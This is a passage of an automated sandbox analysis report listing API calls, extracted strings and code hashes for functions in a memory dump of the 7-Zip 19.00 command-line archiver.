                                                                                                                                        • Instruction ID: 885e5660dd3fa256aae5705402a930c5b6788d210cb0a870cb4132c928c78ee3
                                                                                                                                        • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                        • Instruction Fuzzy Hash: 2F1121B6301941D1EB10DF25E95C35A2331FB85BE5F449222EE6E437A4DF38C959C700
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 002830E7
                                                                                                                                        • fputs.MSVCRT ref: 00283104
                                                                                                                                        • fputs.MSVCRT ref: 00283114
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 0024237E
                                                                                                                                          • Part of subcall function 00242320: fputs.MSVCRT ref: 002423B8
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 002423C4
                                                                                                                                        • fputs.MSVCRT ref: 00283132
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free
                                                                                                                                        • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                                                                                        • API String ID: 3873070119-2741933734
                                                                                                                                        • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                        • Instruction ID: 13fe88288bd1f3a8e8d2601be90591b7d1c82f74f5f9082be2041b1527cf81f0
                                                                                                                                        • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                        • Instruction Fuzzy Hash: 27F06D69301E45D1EE11DF26E9A83996331BB5AFCAF849022DE5E03368DE2CC549C300
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00246F6D
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00246F78
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00246F85
                                                                                                                                          • Part of subcall function 0024339C: free.MSVCRT ref: 002433D7
                                                                                                                                          • Part of subcall function 0024339C: memmove.MSVCRT(00000000,?,?,00000000,002410A8), ref: 002433F2
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00247023
                                                                                                                                        • SetLastError.KERNEL32 ref: 0024705C
                                                                                                                                        • GetLastError.KERNEL32 ref: 00247086
                                                                                                                                          • Part of subcall function 00246C84: CreateDirectoryW.KERNEL32 ref: 00246CA8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
                                                                                                                                        • String ID: .tmp$d
                                                                                                                                        • API String ID: 3444860307-2797371523
                                                                                                                                        • Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                        • Instruction ID: fe89cada14a7051cac44e708fdea78405020022b776d29287845bd1b4197799d
                                                                                                                                        • Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                        • Instruction Fuzzy Hash: E431882A335250D7DB38DF26E84031DA361BB94BC0F419122DE9747B20CF78C496CB01
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$AddressHandleModuleProc
                                                                                                                                        • String ID: CreateHardLinkW$kernel32.dll
                                                                                                                                        • API String ID: 399046674-294928789
                                                                                                                                        • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                        • Instruction ID: ab0b20110ddd2c932d99dfba62db8f97c597d091cf8424f2d04f7e0877375073
                                                                                                                                        • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                        • Instruction Fuzzy Hash: B521071327158141CE64EF25EC5936B5310EBC37D0F841222FE5E87765DE28CC96CB01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: eb8475236ddcd54977022d22a04e14c9310af3fb26cef1595723646017d534d7
                                                                                                                                        • Instruction ID: 118beffd8cc8ca8040db5faf9ba83a0de962db88a71477480427f0e4845a8a46
                                                                                                                                        • Opcode Fuzzy Hash: eb8475236ddcd54977022d22a04e14c9310af3fb26cef1595723646017d534d7
                                                                                                                                        • Instruction Fuzzy Hash: B051E422234A4185CF39EF26E84016A7760FBC5BE4B851225FF5E47765EF38C56ACB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                        • Instruction ID: b9d0103cbede0c3f95ee1e6c16f44659b6fadccdae14e2b744bdabd8f9ea06e2
                                                                                                                                        • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                        • Instruction Fuzzy Hash: 1141E023636581C6CB30AE05D88013D6371F78A7A2F994236FE5E17B94DA34CC9E8704
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 856e238f6b8ec1c50c2be1e4d842062ca70df0d199fcd162584a76eb95b54e90
                                                                                                                                        • Instruction ID: a71dbc57e73cb002583f53cf9d703f28b649a61f57e953bc37a32bdaa340c8e8
                                                                                                                                        • Opcode Fuzzy Hash: 856e238f6b8ec1c50c2be1e4d842062ca70df0d199fcd162584a76eb95b54e90
                                                                                                                                        • Instruction Fuzzy Hash: 0D91D332625B91C2CB15DF25E49076FF3A0F781B94F509216EA4E47768DFB8C8A9CB40
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                        • Instruction ID: 7e54f93f0ff08ab6bf8ee47969c3dcfe36840764db8f3b0b067c53aa7f122450
                                                                                                                                        • Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                        • Instruction Fuzzy Hash: 98513A67229AC485C724DF2AE49079E7765FB86B84F409012DF8E67B15CF39C4AACB04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                        • Instruction ID: fd5b5fc587013e55bf2bb794fcb501329e1979b36758754c85f5250418a81508
                                                                                                                                        • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                        • Instruction Fuzzy Hash: BF4108B6215B84C1CB28DF2AE4942AE73A5FBC9F94F449422DB4E43725DF38C4A9C700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                        • Instruction ID: ca28808178a24b255cbb142352b97cd41006c12f3787f2eb66e28b06800d3c3a
                                                                                                                                        • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                        • Instruction Fuzzy Hash: 2C115E377228C488CB19BE27DC512A82365EF85F94F5D8175BF2D1F39ADE20C8A68750
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                        • Instruction ID: d9fafb5f8e23a4c964ccc3b6ec9a24159a269455c79dc8705efd4a6236778260
                                                                                                                                        • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                        • Instruction Fuzzy Hash: 6201ED23321985D6CB08EF27D95146C7364FB85B947444162AB2D4BB66DF20D8BACB44
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: /$\$a$z
                                                                                                                                        • API String ID: 1294909896-3795456795
                                                                                                                                        • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                        • Instruction ID: f23ca9a03b6e8ba826fd258d77ef80153fd48dc255a4cad4b65688bdc84f28c7
                                                                                                                                        • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                        • Instruction Fuzzy Hash: 5841E592A20A4799DB30EF21D00C6B93764F311B94FD9C226DA4D03394EB7989F6EB01
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 0028878E
                                                                                                                                        • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 0028877E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$fputs
                                                                                                                                        • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                        • API String ID: 2444650769-4238946813
                                                                                                                                        • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                        • Instruction ID: db6d6831d9d9db335ebd97e69e993051dc08bee4b07b14d9522b71872dac0907
                                                                                                                                        • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                        • Instruction Fuzzy Hash: 3121842A3266C5C5DA70EF11FA843A9B361B785785FA84421CA4D57B59DF3CC8A9CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                                        • API String ID: 1646373207-4044117955
                                                                                                                                        • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                        • Instruction ID: d005d1806063bf60c796ce2376e2635aaab0c9ff036159a7628e6dc83afede92
                                                                                                                                        • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                        • Instruction Fuzzy Hash: 0DE07E6C653A0692EA84DB51FEAC35423A4F749765FA08025C80A03724EF3CC19AC700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                        • Instruction ID: e7ae6918a51d4c6181575cee37c763aba8949cdbea316ec2458fcfab38939d14
                                                                                                                                        • Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                        • Instruction Fuzzy Hash: CC311C26334ED183CB14EE27D89025D6710AF96FE4B485221FFAE1B79ACF19C4568B40
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 408039514-0
                                                                                                                                        • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                        • Instruction ID: 2842ff7c9bf1fa2d4c52fc4fb9111b2625db5cac855ec3be4d4c98053506b745
                                                                                                                                        • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                        • Instruction Fuzzy Hash: CC316E23234580CBCB30DF25E89025AB764F7C5794F841125EB9E87A69DF79D8A5CF00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                        • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                        • Instruction ID: f12c78388db15d71cc40880653bcd2885de7b2fca31ef68f2c15f55eb2a8d591
                                                                                                                                        • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                        • Instruction Fuzzy Hash: DC31F4A532970180EF04EF2698593A82761EB09FD8FC2E091DE0F97246EF74CE65C314
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                        • Instruction ID: 010579e4bf0214f62805986d9ddf7d9ffdf921d3aca596dc31a6874de0619195
                                                                                                                                        • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                        • Instruction Fuzzy Hash: 42012C6326A5C0C5C729FB33E45266E6354FBC3B91F8410A2AF4E13712CE38C4ABCA04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                        • Instruction ID: 71f6a5cb4fc0ccdfd788100abf9c61c6fcde98403f51d749e6c1dfb464a86c11
                                                                                                                                        • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                        • Instruction Fuzzy Hash: 5301BB622665C085CB19FF37E45166E5354EBC7B91F411061AF4E53716CE38C49BCA08
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
